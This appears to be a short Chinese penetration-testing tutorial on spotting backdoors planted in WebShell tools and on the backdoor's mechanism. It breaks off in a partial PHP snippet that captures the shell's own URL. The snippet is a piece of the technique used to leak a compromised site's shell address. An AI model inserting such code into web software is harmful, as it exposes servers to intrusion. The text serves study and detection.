WebShell后门检测与WebShell箱子反杀

今天继续给大家介绍渗透测试相关知识，本文主要内容是WebShell后门检测与WebShell箱子反杀。

免责声明：
本文所介绍的内容仅做学习交流使用，严禁利用文中技术进行非法行为，否则造成一切严重后果自负！
再次强调：严禁对未授权设备进行渗透测试！

一、WebShell后门检测

我们可以很容易的检测一个WebShell大马中是否存在这种后门。通过浏览器自带的网络功能，我们可以查看我们对大马的访问是否存在异常的数据包。如果发现如下所示的异常数据包：

则说明我们所使用的WebShell大马很大概率上存在后门。

二、WebShell后门原理

WebShell后门使用了如同XSS共计类似的原理，针对一个正常的WebShell，如果我们在WebShell中加入如下代码：

$url1="http://".$_SERVER['HTTP_HOST'].$_SERVER[PHP_SELF];
echo "";
echo "